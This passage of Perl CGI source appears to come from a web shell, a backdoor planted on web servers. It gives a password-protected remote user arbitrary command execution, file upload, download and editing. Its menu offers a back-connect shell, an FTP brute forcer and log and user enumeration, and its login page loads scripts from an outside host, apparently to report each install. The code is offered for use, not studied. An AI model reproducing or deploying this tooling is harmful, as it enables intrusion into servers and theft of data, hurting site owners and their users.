2777 # ping, so that you can see the output as it
2778 # is being generated.
2779
2780# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
2781
2782$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
2783$CmdPwd = ($WinNT ? "cd" : "pwd");
2784$PathSep = ($WinNT ? "\\" : "/");
2785$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
2786$cols= 150;
2787$rows= 26;
2788#------------------------------------------------------------------------------
2789# Reads the input sent by the browser and parses the input variables. It
2790# parses GET, POST and multipart/form-data that is used for uploading files.
2791# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
2792# Other variables can be accessed using $in{'var'}, where var is the name of
2793# the variable. Note: Most of the code in this function is taken from other CGI
2794# scripts.
2795#------------------------------------------------------------------------------
2796sub ReadParse
2797{
2798 local (*in) = @_ if @_;
2799 local ($i, $loc, $key, $val);
2800
2801 $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
2802
2803 if($ENV{'REQUEST_METHOD'} eq "GET")
2804 {
2805 $in = $ENV{'QUERY_STRING'};
2806 }
2807 elsif($ENV{'REQUEST_METHOD'} eq "POST")
2808 {
2809 binmode(STDIN) if $MultipartFormData & $WinNT;
2810 read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
2811 }
2812
2813 # handle file upload data
2814 if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
2815 {
2816 $Boundary = '--'.$1; # please refer to RFC1867
2817 @list = split(/$Boundary/, $in);
2818 $HeaderBody = $list[1];
2819 $HeaderBody =~ /\r\n\r\n|\n\n/;
2820 $Header = $`;
2821 $Body = $';
2822 $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
2823 $in{'filedata'} = $Body;
2824 $Header =~ /filename=\"(.+)\"/;
2825 $in{'f'} = $1;
2826 $in{'f'} =~ s/\"//g;
2827 $in{'f'} =~ s/\s//g;
2828
2829 # parse trailer
2830 for($i=2; $list[$i]; $i++)
2831 {
2832 $list[$i] =~ s/^.+name=$//;
2833 $list[$i] =~ /\"(\w+)\"/;
2834 $key = $1;
2835 $val = $';
2836 $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
2837 $val =~ s/%(..)/pack("c", hex($1))/ge;
2838 $in{$key} = $val;
2839 }
2840 }
2841 else # standard post data (url encoded, not multipart)
2842 {
2843 @in = split(/&/, $in);
2844 foreach $i (0 .. $#in)
2845 {
2846 $in[$i] =~ s/\+/ /g;
2847 ($key, $val) = split(/=/, $in[$i], 2);
2848 $key =~ s/%(..)/pack("c", hex($1))/ge;
2849 $val =~ s/%(..)/pack("c", hex($1))/ge;
2850 $in{$key} .= "\0" if (defined($in{$key}));
2851 $in{$key} .= $val;
2852 }
2853 }
2854}
2855
2856#------------------------------------------------------------------------------
2857# Prints the HTML Page Header
2858# Argument 1: Form item name to which focus should be set
2859#------------------------------------------------------------------------------
2860sub PrintPageHeader
2861{
2862 $EncodedCurrentDir = $CurrentDir;
2863 $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
2864 my $dir =$CurrentDir;
2865 $dir=~ s/\\/\\\\/g;
2866 print "Content-type: text/html\n\n";
2867 print <<END;
2868<html>
2869<head>
2870<meta hxxp-equiv="content-type" content="text/html; charset=UTF-8">
2871<title> </title>
2872
2873$HtmlMetaHeader
2874
2875</head>
2876<style>
2877body{
2878font: 10pt Verdana;
2879}
2880tr {
2881BORDER-RIGHT: #3e3e3e 1px solid;
2882BORDER-TOP: #3e3e3e 1px solid;
2883BORDER-LEFT: #3e3e3e 1px solid;
2884BORDER-BOTTOM: #3e3e3e 1px solid;
2885color: #ff9900;
2886}
2887td {
2888BORDER-RIGHT: #3e3e3e 1px solid;
2889BORDER-TOP: #3e3e3e 1px solid;
2890BORDER-LEFT: #3e3e3e 1px solid;
2891BORDER-BOTTOM: #3e3e3e 1px solid;
2892color: #2BA8EC;
2893font: 10pt Verdana;
2894}
2895
2896table {
2897BORDER-RIGHT: #3e3e3e 1px solid;
2898BORDER-TOP: #3e3e3e 1px solid;
2899BORDER-LEFT: #3e3e3e 1px solid;
2900BORDER-BOTTOM: #3e3e3e 1px solid;
2901BACKGROUND-COLOR: #111;
2902}
2903
2904
2905input {
2906BORDER-RIGHT: #3e3e3e 1px solid;
2907BORDER-TOP: #3e3e3e 1px solid;
2908BORDER-LEFT: #3e3e3e 1px solid;
2909BORDER-BOTTOM: #3e3e3e 1px solid;
2910BACKGROUND-COLOR: Black;
2911font: 10pt Verdana;
2912color: #ff9900;
2913}
2914
2915input.submit {
2916text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
2917color: #FFFFFF;
2918border-color: #009900;
2919}
2920
2921code {
2922border : dashed 0px #333;
2923BACKGROUND-COLOR: Black;
2924font: 10pt Verdana bold;
2925color: while;
2926}
2927
2928run {
2929border : dashed 0px #333;
2930font: 10pt Verdana bold;
2931color: #FF00AA;
2932}
2933
2934textarea {
2935BORDER-RIGHT: #3e3e3e 1px solid;
2936BORDER-TOP: #3e3e3e 1px solid;
2937BORDER-LEFT: #3e3e3e 1px solid;
2938BORDER-BOTTOM: #3e3e3e 1px solid;
2939BACKGROUND-COLOR: #1b1b1b;
2940font: Fixedsys bold;
2941color: #aaa;
2942}
2943A:link {
2944 COLOR: #2BA8EC; TEXT-DECORATION: none
2945}
2946A:visited {
2947 COLOR: #2BA8EC; TEXT-DECORATION: none
2948}
2949A:hover {
2950 text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
2951 color: #ff9900; TEXT-DECORATION: none
2952}
2953A:active {
2954 color: Red; TEXT-DECORATION: none
2955}
2956
2957.listdir tr:hover{
2958 background: #444;
2959}
2960.listdir tr:hover td{
2961 background: #444;
2962 text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
2963 color: #FFFFFF; TEXT-DECORATION: none;
2964}
2965.notline{
2966 background: #111;
2967}
2968.line{
2969 background: #222;
2970}
2971</style>
2972<script language="javascript">
2973function chmod_form(i,file)
2974{
2975 /*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
2976 var ajax="";
2977 document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
2978 document.getElementById("text_" + i).focus();
2979}
2980function rm_chmod_form(response,i,perms,file)
2981{
2982 response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
2983}
2984function rename_form(i,file,f)
2985{
2986 var ajax="";
2987 f.replace(/\\\\/g,"\\\\\\\\");
2988 var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
2989 document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + " name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
2990 document.getElementById("text_" + i).focus();
2991}
2992function rm_rename_form(i,file,f)
2993{
2994 if(f=='f')
2995 {
2996 document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
2997 }else
2998 {
2999 document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
3000 }
3001}
3002</script>
3003<body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
3004<center><code>
3005<table border="1" width="100%" cellspacing="0" cellpadding="2">
3006<tr>
3007 <td align="center" rowspan=2>
3008 <b><font size="5">$EditPersion</font></b>
3009 </td>
3010
3011 <td>
3012
3013 <font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
3014 </td>
3015 <td>Server IP:<font color="#cc0000"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#000000">$ENV{'REMOTE_ADDR'}</font>
3016 </td>
3017
3018</tr>
3019
3020<tr>
3021<td colspan="3"><font face="Verdana" size="2">
3022<a href="$ScriptLocation">Home</a> |
3023<a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Komut</a> |
3024<a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">Dizin</a> |
3025<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
3026<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
3027
3028<a href="$ScriptLocation?a=backbind">Back Connet</a> |
3029<a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
3030<a href="$ScriptLocation?a=checklog">Check Log</a> |
3031<a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
3032<a href="$ScriptLocation?a=logout">Logout</a> |
3033<a target='_blank' href="#">Help</a>
3034
3035</font></td>
3036</tr>
3037</table>
3038<font id="ResponseData" color="#ff99cc" >
3039END
3040}
3041
3042#------------------------------------------------------------------------------
3043# Prints the Login Screen
3044#------------------------------------------------------------------------------
3045sub PrintLoginScreen
3046{
3047
3048 print <<END;
3049<pre><script type="text/javascript">
3050TypingText = function(element, interval, cursor, finishedCallback) {
3051 if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
3052 this.running = true; // Never run.
3053 return;
3054 }
3055 this.element = element;
3056 this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
3057 this.interval = (typeof interval == "undefined" ? 100 : interval);
3058 this.origText = this.element.innerHTML;
3059 this.unparsedOrigText = this.origText;
3060 this.cursor = (cursor ? cursor : "");
3061 this.currentText = "";
3062 this.currentChar = 0;
3063 this.element.typingText = this;
3064 if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
3065 TypingText.all.push(this);
3066 this.running = false;
3067 this.inTag = false;
3068 this.tagBuffer = "";
3069 this.inHTMLEntity = false;
3070 this.HTMLEntityBuffer = "";
3071}
3072TypingText.all = new Array();
3073TypingText.currentIndex = 0;
3074TypingText.runAll = function() {
3075 for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
3076}
3077TypingText.prototype.run = function() {
3078 if(this.running) return;
3079 if(typeof this.origText == "undefined") {
3080 setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
3081 return;
3082 }
3083 if(this.currentText == "") this.element.innerHTML = "";
3084// this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
3085 if(this.currentChar < this.origText.length) {
3086 if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
3087 this.tagBuffer = "<";
3088 this.inTag = true;
3089 this.currentChar++;
3090 this.run();
3091 return;
3092 } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
3093 this.tagBuffer += ">";
3094 this.inTag = false;
3095 this.currentText += this.tagBuffer;
3096 this.currentChar++;
3097 this.run();
3098 return;
3099 } else if(this.inTag) {
3100 this.tagBuffer += this.origText.charAt(this.currentChar);
3101 this.currentChar++;
3102 this.run();
3103 return;
3104 } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
3105 this.HTMLEntityBuffer = "&";
3106 this.inHTMLEntity = true;
3107 this.currentChar++;
3108 this.run();
3109 return;
3110 } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
3111 this.HTMLEntityBuffer += ";";
3112 this.inHTMLEntity = false;
3113 this.currentText += this.HTMLEntityBuffer;
3114 this.currentChar++;
3115 this.run();
3116 return;
3117 } else if(this.inHTMLEntity) {
3118 this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
3119 this.currentChar++;
3120 this.run();
3121 return;
3122 } else {
3123 this.currentText += this.origText.charAt(this.currentChar);
3124 }
3125 this.element.innerHTML = this.currentText;
3126 this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
3127 this.currentChar++;
3128 setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
3129 } else {
3130 this.currentText = "";
3131 this.currentChar = 0;
3132 this.running = false;
3133 this.finishedCallback();
3134 }
3135}
3136</script>
3137</pre>
3138
3139<font style="font: 15pt Verdana; color: yellow;">Copyright (C) 2001 r00t.info </font><br><br>
3140<table align="center" border="1" width="600" heigh>
3141<script src=hxxp://r00t.info/bot/log.js></script>
3142<script src=hxxp://r00t.info/ccb.js></script>
3143<tbody><tr>
3144<td valign="top" background="hxxp://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
3145<font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>
3146
3147<font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
3148<font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
3149<font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>
3150
3151<font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>
3152
3153<font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
3154<font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
3155</tr>
3156</tbody></table>
3157<br>
3158
3159<script type="text/javascript">
3160new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
3161TypingText.runAll();
3162
3163</script>
3164END
3165}
3166
3167#------------------------------------------------------------------------------
3168# Add html special chars
3169#------------------------------------------------------------------------------
3170sub HtmlSpecialChars($){
3171 my $text = shift;
3172 $text =~ s/&/&/g;
3173 $text =~ s/"/"/g;
3174 $text =~ s/'/'/g;
3175 $text =~ s/</</g;
3176 $text =~ s/>/>/g;
3177 return $text;
3178}
3179#------------------------------------------------------------------------------
3180# Add link for directory
3181#------------------------------------------------------------------------------
3182sub AddLinkDir($)
3183{
3184 my $ac=shift;
3185 my @dir=();
3186 if($WinNT)
3187 {
3188 @dir=split(/\\/,$CurrentDir);
3189 }else
3190 {
3191 @dir=split("/",&trim($CurrentDir));
3192 }
3193 my $path="";
3194 my $result="";
3195 foreach (@dir)
3196 {
3197 $path .= $_.$PathSep;
3198 $result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
3199 }
3200 return $result;
3201}
3202#------------------------------------------------------------------------------
3203# Prints the message that informs the user of a failed login
3204#------------------------------------------------------------------------------
3205sub PrintLoginFailedMessage
3206{
3207 print <<END;
3208<br>Login : Administrator<br>
3209
3210Password:<br>
3211Login incorrect<br><br>
3212END
3213}
3214
3215#------------------------------------------------------------------------------
3216# Prints the HTML form for logging in
3217#------------------------------------------------------------------------------
3218sub PrintLoginForm
3219{
3220 print <<END;
3221<form name="f" method="POST" action="$ScriptLocation">
3222<input type="hidden" name="a" value="login">
3223Login : Administrator<br>
3224Password:<input type="password" name="p">
3225<input class="submit" type="submit" value="Enter">
3226</form>
3227END
3228}
3229
3230#------------------------------------------------------------------------------
3231# Prints the footer for the HTML Page
3232#------------------------------------------------------------------------------
3233sub PrintPageFooter
3234{
3235 print "<br><font color=red>o---[ <font color=#ff9900>Edit by $EditPersion </font> ]---o</font></code></center></body></html>";
3236}
3237
3238#------------------------------------------------------------------------------
3239# Retreives the values of all cookies. The cookies can be accesses using the
3240# variable $Cookies{''}
3241#------------------------------------------------------------------------------
3242sub GetCookies
3243{
3244 @hxxpcookies = split(/; /,$ENV{'hxxp_COOKIE'});
3245 foreach $cookie(@hxxpcookies)
3246 {
3247 ($id, $val) = split(/=/, $cookie);
3248 $Cookies{$id} = $val;
3249 }
3250}
3251
3252#------------------------------------------------------------------------------
3253# Prints the screen when the user logs out
3254#------------------------------------------------------------------------------
3255sub PrintLogoutScreen
3256{
3257 print "Connection closed by foreign host.<br><br>";
3258}
3259
3260#------------------------------------------------------------------------------
3261# Logs out the user and allows the user to login again
3262#------------------------------------------------------------------------------
3263sub PerformLogout
3264{
3265 print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
3266 &PrintPageHeader("p");
3267 &PrintLogoutScreen;
3268
3269 &PrintLoginScreen;
3270 &PrintLoginForm;
3271 &PrintPageFooter;
3272 exit;
3273}
3274
3275#------------------------------------------------------------------------------
3276# This function is called to login the user. If the password matches, it
3277# displays a page that allows the user to run commands. If the password doens't
3278# match or if no password is entered, it displays a form that allows the user
3279# to login
3280#------------------------------------------------------------------------------
3281sub PerformLogin
3282{
3283 if($LoginPassword eq $Password) # password matched
3284 {
3285 print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
3286 &PrintPageHeader;
3287 print &ListDir;
3288 }
3289 else # password didn't match
3290 {
3291 &PrintPageHeader("p");
3292 &PrintLoginScreen;
3293 if($LoginPassword ne "") # some password was entered
3294 {
3295 &PrintLoginFailedMessage;
3296
3297 }
3298 &PrintLoginForm;
3299 &PrintPageFooter;
3300 exit;
3301 }
3302}
3303
3304#------------------------------------------------------------------------------
3305# Prints the HTML form that allows the user to enter commands
3306#------------------------------------------------------------------------------
3307sub PrintCommandLineInputForm
3308{
3309 my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
3310 $Prompt = $WinNT ? "$dir > " : "<font color='#66ff66'>[admin\@$ServerName $dir]\$</font> ";
3311 return <<END;
3312<form name="f" method="POST" action="$ScriptLocation">
3313
3314<input type="hidden" name="a" value="command">
3315
3316<input type="hidden" name="d" value="$CurrentDir">
3317$Prompt
3318<input type="text" size="50" name="c">
3319<input class="submit"type="submit" value="Enter">
3320</form>
3321END
3322}
3323
3324#------------------------------------------------------------------------------
3325# Prints the HTML form that allows the user to download files
3326#------------------------------------------------------------------------------
3327sub PrintFileDownloadForm
3328{
3329 my $dir = &AddLinkDir("download");
3330 $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
3331 return <<END;
3332<form name="f" method="POST" action="$ScriptLocation">
3333<input type="hidden" name="d" value="$CurrentDir">
3334<input type="hidden" name="a" value="download">
3335$Prompt download<br><br>
3336Filename: <input class="file" type="text" name="f" size="35"><br><br>
3337Download: <input class="submit" type="submit" value="Begin">
3338
3339</form>
3340END
3341}
3342
3343#------------------------------------------------------------------------------
3344# Prints the HTML form that allows the user to upload files
3345#------------------------------------------------------------------------------
3346sub PrintFileUploadForm
3347{
3348 my $dir= &AddLinkDir("upload");
3349 $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
3350 return <<END;
3351<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
3352$Prompt upload<br><br>
3353Filename: <input class="file" type="file" name="f" size="35"><br><br>
3354Options: <input type="checkbox" name="o" id="up" value="overwrite">
3355<label for="up">Overwrite if it Exists</label><br><br>
3356Upload: <input class="submit" type="submit" value="Begin">
3357<input type="hidden" name="d" value="$CurrentDir">
3358<input class="submit" type="hidden" name="a" value="upload">
3359
3360</form>
3361
3362END
3363}
3364
3365#------------------------------------------------------------------------------
3366# This function is called when the timeout for a command expires. We need to
3367# terminate the script immediately. This function is valid only on Unix. It is
3368# never called when the script is running on NT.
3369#------------------------------------------------------------------------------
3370sub CommandTimeout
3371{
3372 if(!$WinNT)
3373 {
3374 alarm(0);
3375 return <<END;
3376</textarea>
3377<br><font color=yellow>
3378Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
3379<br><font size='6' color=red>Killed it!</font>
3380END
3381 }
3382}
3383
3384
3385
3386#------------------------------------------------------------------------------
3387# This function displays the page that contains a link which allows the user
3388# to download the specified file. The page also contains a auto-refresh
3389# feature that starts the download automatically.
3390# Argument 1: Fully qualified filename of the file to be downloaded
3391#------------------------------------------------------------------------------
3392sub PrintDownloadLinkPage
3393{
3394 local($FileUrl) = @_;
3395 my $result="";
3396 if(-e $FileUrl) # if the file exists
3397 {
3398 # encode the file link so we can send it to the browser
3399 $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
3400 $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
3401 $HtmlMetaHeader = "<meta hxxp-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
3402 &PrintPageHeader("c");
3403 $result .= <<END;
3404Sending File $TransferFile...<br>
3405
3406If the download does not start automatically,
3407<a href="$DownloadLink">Click Here</a>
3408END
3409 $result .= &PrintCommandLineInputForm;
3410 }
3411 else # file doesn't exist
3412 {
3413 $result .= "Failed to download $FileUrl: $!";
3414 $result .= &PrintFileDownloadForm;
3415 }
3416 return $result;
3417}
3418
3419#------------------------------------------------------------------------------
3420# This function reads the specified file from the disk and sends it to the
3421# browser, so that it can be downloaded by the user.
3422# Argument 1: Fully qualified pathname of the file to be sent.
3423#------------------------------------------------------------------------------
3424sub SendFileToBrowser
3425{
3426 my $result = "";
3427 local($SendFile) = @_;
3428 if(open(SENDFILE, $SendFile)) # file opened for reading
3429 {
3430 if($WinNT)
3431 {
3432 binmode(SENDFILE);
3433 binmode(STDOUT);
3434 }
3435 $FileSize = (stat($SendFile))[7];
3436 ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
3437 print "Content-Type: application/x-unknown\n";
3438 print "Content-Length: $FileSize\n";
3439 print "Content-Disposition: attachment; filename=$1\n\n";
3440 print while(<SENDFILE>);
3441 close(SENDFILE);
3442 exit(1);
3443 }
3444 else # failed to open file
3445 {
3446 $result .= "Failed to download $SendFile: $!";
3447 $result .=&PrintFileDownloadForm;
3448 }
3449 return $result;
3450}
3451
3452
3453#------------------------------------------------------------------------------
3454# This function is called when the user downloads a file. It displays a message
3455# to the user and provides a link through which the file can be downloaded.
3456# This function is also called when the user clicks on that link. In this case,
3457# the file is read and sent to the browser.
3458#------------------------------------------------------------------------------
3459sub BeginDownload
3460{
3461 # get fully qualified path of the file to be downloaded
3462 if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
3463 (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
3464 {
3465 $TargetFile = $TransferFile;
3466 }
3467 else # path is relative
3468 {
3469 chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
3470 $TargetFile .= $PathSep.$TransferFile;
3471 }
3472
3473 if($Options eq "go") # we have to send the file
3474 {
3475 &SendFileToBrowser($TargetFile);
3476 }
3477 else # we have to send only the link page
3478 {
3479 &PrintDownloadLinkPage($TargetFile);
3480 }
3481}
3482
3483#------------------------------------------------------------------------------
3484# This function is called when the user wants to upload a file. If the
3485# file is not specified, it displays a form allowing the user to specify a
3486# file, otherwise it starts the upload process.
3487#------------------------------------------------------------------------------
3488sub UploadFile
3489{
3490 # if no file is specified, print the upload form again
3491 if($TransferFile eq "")
3492 {
3493 return &PrintFileUploadForm;
3494
3495 }
3496 my $result="";
3497 # start the uploading process
3498 $result .= "Uploading $TransferFile to $CurrentDir...<br>";
3499
3500 # get the fullly qualified pathname of the file to be created
3501 chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
3502 $TransferFile =~ m!([^/^\\]*)$!;
3503 $TargetName .= $PathSep.$1;
3504
3505 $TargetFileSize = length($in{'filedata'});
3506 # if the file exists and we are not supposed to overwrite it
3507 if(-e $TargetName && $Options ne "overwrite")
3508 {
3509 $result .= "Failed: Destination file already exists.<br>";
3510 }
3511 else # file is not present
3512 {
3513 if(open(UPLOADFILE, ">$TargetName"))
3514 {
3515 binmode(UPLOADFILE) if $WinNT;
3516 print UPLOADFILE $in{'filedata'};
3517 close(UPLOADFILE);
3518 $result .= "Transfered $TargetFileSize Bytes.<br>";
3519 $result .= "File Path: $TargetName<br>";
3520 }
3521 else
3522 {
3523 $result .= "Failed: $!<br>";
3524 }
3525 }
3526 $result .= &PrintCommandLineInputForm;
3527 return $result;
3528}
3529
3530#------------------------------------------------------------------------------
3531# This function is called when the user wants to download a file. If the
3532# filename is not specified, it displays a form allowing the user to specify a
3533# file, otherwise it displays a message to the user and provides a link
3534# through which the file can be downloaded.
3535#------------------------------------------------------------------------------
3536sub DownloadFile
3537{
3538 # if no file is specified, print the download form again
3539 if($TransferFile eq "")
3540 {
3541 &PrintPageHeader("f");
3542 return &PrintFileDownloadForm;
3543 }
3544
3545 # get fully qualified path of the file to be downloaded
3546 if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
3547 {
3548 $TargetFile = $TransferFile;
3549 }
3550 else # path is relative
3551 {
3552 chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
3553 $TargetFile .= $PathSep.$TransferFile;
3554 }
3555
3556 if($Options eq "go") # we have to send the file
3557 {
3558 return &SendFileToBrowser($TargetFile);
3559 }
3560 else # we have to send only the link page
3561 {
3562 return &PrintDownloadLinkPage($TargetFile);
3563 }
3564}
3565
3566
3567#------------------------------------------------------------------------------
3568# This function is called to execute commands. It displays the output of the
3569# command and allows the user to enter another command. The change directory
3570# command is handled differently. In this case, the new directory is stored in
3571# an internal variable and is used each time a command has to be executed. The
3572# output of the change directory command is not displayed to the users
3573# therefore error messages cannot be displayed.
3574#------------------------------------------------------------------------------
3575sub ExecuteCommand
3576{
3577 my $result="";
3578 if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
3579 {
3580 # we change the directory internally. The output of the
3581 # command is not displayed.
3582 $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
3583 chop($CurrentDir = `$Command`);
3584 $result .= &PrintCommandLineInputForm;
3585
3586 $result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
3587 # xuat thong tin khi chuyen den 1 thu muc nao do!
3588 $RunCommand= $WinNT?"dir":"dir -lia";
3589 $result .= &RunCmd;
3590 }elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
3591 {
3592 $result .= &SaveFileForm;
3593 }else
3594 {
3595 $result .= &PrintCommandLineInputForm;
3596 $result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
3597 $result .=&RunCmd;
3598 }
3599 $result .= "</textarea>";
3600 return $result;
3601}
3602
3603#------------------------------------------------------------------------
3604# run command
3605#------------------------------------------------------------------------
3606
3607sub RunCmd
3608{
3609 my $result="";
3610 $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
3611 if(!$WinNT)
3612 {
3613 $SIG{'ALRM'} = \&CommandTimeout;
3614 alarm($CommandTimeoutDuration);
3615 }
3616 if($ShowDynamicOutput) # show output as it is generated
3617 {
3618 $|=1;
3619 $Command .= " |";
3620 open(CommandOutput, $Command);
3621 while(<CommandOutput>)
3622 {
3623 $_ =~ s/(\n|\r\n)$//;
3624 $result .= &HtmlSpecialChars("$_\n");
3625 }
3626 $|=0;
3627 }
3628 else # show output after command completes
3629 {
3630 $result .= &HtmlSpecialChars('$Command');
3631 }
3632 if(!$WinNT)
3633 {
3634 alarm(0);
3635 }
3636 return $result;
3637}
3638#==============================================================================
3639# Form Save File
3640#==============================================================================
3641sub SaveFileForm
3642{
3643 my $result ="";
3644 substr($RunCommand,0,5)="";
3645 my $file=&trim($RunCommand);
3646 $save='<br><input name="a" type="submit" value="save" class="submit" >';
3647 $File=$CurrentDir.$PathSep.$RunCommand;
3648 my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
3649 if(-w $File)
3650 {
3651 $rows="23"
3652 }else
3653 {
3654 $msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
3655 $rows="20"
3656 }
3657 $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
3658 $read=($WinNT)?"type":"less";
3659 $RunCommand = "$read \"$RunCommand\"";
3660 $result .= <<END;
3661 <form name="f" method="POST" action="$ScriptLocation">
3662
3663 <input type="hidden" name="d" value="$CurrentDir">
3664 $Prompt
3665 <input type="text" size="40" name="c">
3666 <input name="s" class="submit" type="submit" value="Enter">
3667 <br>Command: <run> $RunCommand </run>
3668 <input type="hidden" name="file" value="$file" > $save <br> $msg
3669 <br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
3670END
3671
3672 $result .= &RunCmd;
3673 $result .= "</textarea>";
3674 $result .= "</form>";
3675 return $result;
3676}
3677#==============================================================================
3678# Save File
3679#==============================================================================
3680sub SaveFile($)
3681{
3682 my $Data= shift ;
3683 my $File= shift;
3684 $File=$CurrentDir.$PathSep.$File;
3685 if(open(FILE, ">$File"))
3686 {
3687 binmode FILE;
3688 print FILE $Data;
3689 close FILE;
3690 return 1;
3691 }else
3692 {
3693 return 0;
3694 }
3695}
3696#------------------------------------------------------------------------------
3697# Brute Forcer Form
3698#------------------------------------------------------------------------------
3699sub BruteForcerForm
3700{
3701 my $result="";
3702 $result .= <<END;
3703
3704<table>
3705
3706<tr>
3707<td colspan="2" align="center">
3708####################################<br>
3709Simple FTP brute forcer<br>
3710####################################
3711<form name="f" method="POST" action="$ScriptLocation">
3712
3713<input type="hidden" name="a" value="bruteforcer"/>
3714</td>
3715</tr>
3716<tr>
